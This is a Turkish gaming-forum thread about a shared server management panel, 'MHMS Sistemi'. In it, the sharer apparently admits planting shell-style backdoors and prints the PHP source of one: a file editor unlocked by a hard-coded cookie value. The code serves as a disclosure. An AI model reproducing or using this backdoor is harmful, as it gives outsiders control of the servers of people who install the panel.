Best Studio 1
Best Studio
Bvural41 1
Bvural41
noisiv 1
noisiv
Manwe Work 1
Manwe Work
Hikaye Ekle

Dev Konu Dev MHMS Sistemi (17+) Tema ile birlikte

• Konuyu başlatan Konuyu başlatan leopar22
  • Başlangıç tarihi Başlangıç tarihi
  • Cevaplar Cevaplar 32
  • Görüntüleme Görüntüleme 8K
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

HERAKLES Otomatik Avlı kalıcı sunucu. 19 Haziran'da açılıyor. Atius & Wizard güvencesiyle hemen kayıt ol, ön kayıt ödülleri aktif. HEMEN TIKLA!

Arkadaşlar Bu Bir Komplo Çekemeyenler Gitti burak Selvinin PAylaştıklarını Sildi Ve Yerine Bşaka Bir Şey Birakti Yani Adam Açık Koysa ve bu Açık Görülmese Adam Salakmı Desin Arkadaşlar Shell Koymuşum inanmayin ben Kurdum Valla Harika Çalışıyor

#Burak_Selvi

Neresi komplo ben anlıyamadım? DurabLee yani Burak Selvi değil mi o konuyu paylaşıp sonra açık koydum diyen? Aşşağıdaki mesajda ona ait değil mi? Komplo olarak tabir ettiğiniz şey nedir?

* Konuyu kaldırma kararı aldım kimseye daha fazla kötülük yapmak istemiyorum artık bazılarınız vürüs programları ile taratsada içersine koydugum shell tarzı acıklar nedeniyle üzgünüm
koydugum açıgı bulanlar yine kullansın dosya yoneticisi tarzında bir açık
vicdan azabı ile yanmak istemiyorum acıgın resimleri
bana zarar verdikleri için bende insanlara vermek istedim bi an yeyse kapildim vürüs programlarının görmediği birçok yerde yem olarak bunlardan mevcuttur herkesten özür dilerim çaldığım panellerin sahiplerindende özür diliyorum

cJh9sss.png

1pl6Z67.png

Açıgımdan birinin kaynak kodları bulup silebilenler kullansın

<?php
error_reporting(0);
@ob_start(); @session_start();
$editor_kaynak = "vpi/";

include($editor_kaynak."editor_ust.php");
?><hr /><?

$s = "123654789000";

$admin = $_COOKIE["admin"];

if(empty($admin)){
include($editor_kaynak."inc/giris.php");
}else{

if($admin == $s){

}else{

header("location:logout.php");

}

?><div style="margin-left:10px; margin-right:10px; "><?
include($editor_kaynak."inc/functions.php");
include($editor_kaynak."editor2.php");

?></div><?

}
include($editor_kaynak."editor_alt.php");

?>

Herkesten özür dilerim

Artık Hizmet Veremiyoruz!

Çünkü,

verdiğimiz hizmeti çekemeyen, bu işten rant sağlamak isteyen bazı kişiler,
sunucumuzda ki diğer sitelerden kaynaklanan bir açık nedeniyle veri tabanımıza erişmiş ve müşterilerimize geri dönülemez zararlar vermiştir.

Biz de bunları telafi etmek maksatlı özel yazılımımızı paylaşıp sektöre elveda edeceğiz ama arkamızda çok güzel bir de miras bırakmış olacağız.
Açık kaynak olduğu için rahatlıkla güvenip kullanabilirsiniz.

Not: konunun sabitlenmesi için rica ediyorum.
Geliştiricilere Not: Sistem çok kolay bir şekilde tema yapılır vaziyettedir. İçindeki yapılan temalara bakarak siz de bir tema ayarlayabilirsiniz.

Kurulum Aşaması

Aşağıda bulunan indirme linklerinden gerekli dosyaları indirip masaüstüne çıkartınız.
daha sonra içinden "ayarlar.php" kendinize göre düzenleyiniz.
daha sonra "Kurulum/SQL" klasöründe bulunan "OKU.txt" yazan yerdeki metine göre sql ayarlarınızı yapın.
Admine giriş bilgileriniz: mhms_admin/giris.php (Kullanıcı adı : admin - Parola : 123456 ) olmaktadır. Kurulumdan sonra değiştirmeyi unutmayınız. Daha sonra gerekli ayarları yönetim panel üzerinden yapabilirsiniz.
Otomatik: ban açma / davet sistemi / turnuva sistemi gibi şeyleri "cronjob.php" dosyasını hostinginizin yönetim panelinden "Cron İşleri veya CronJobs" ayarından dosyayı 5 dakika da 1 kez kontrol etmeye ayarlayıp onuda çözmüş olursunuz.

Web Panel Tanıtım Videosu

Yönetim Paneli Tanıtım Videosu

İndirme Linkleri

Virüs Total -

Not: Sistemi kendi isteğimle paylaşmaktayım. Her hangi bir telif hakkı, lisans içermemektedir.
Dipnot: diğer hesabıma erişemiyorum o düzenlenen konudaki yazılarla hiç bir alakam yoktur. Bu konu üzerinden devam ediyorum.

kardeş bu hangi dosyada açık var

Moderatör tarafında düzenlendi:
Zaten Güzel Birşey Paylasılıyor Hemen 1 Açık Koyuyorlar Nasıl İş Anlamadım .

Bari Açıkların Oldugu Yerlerı soyle kapatalım

Neresi komplo ben anlıyamadım? DurabLee yani Burak Selvi değil mi o konuyu paylaşıp sonra açık koydum diyen? Aşşağıdaki mesajda ona ait değil mi? Komplo olarak tabir ettiğiniz şey nedir?
Anladığım kadarıyla burak selviye komplo kuran kişiler ilk önce turkmmo hesabını ele geçirmiş sonra sitedeki açıktan çekdikleri panele shell açığı koyup dün paylaşmış sabahda açık vardır diye burak selvinin bütün paylaşımlarda açık olduğunu belirterek adını lekelemek istemiş.

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Şu an konuyu görüntüleyenler (Toplam : 0, Üye: 0, Misafir: 0)

Geri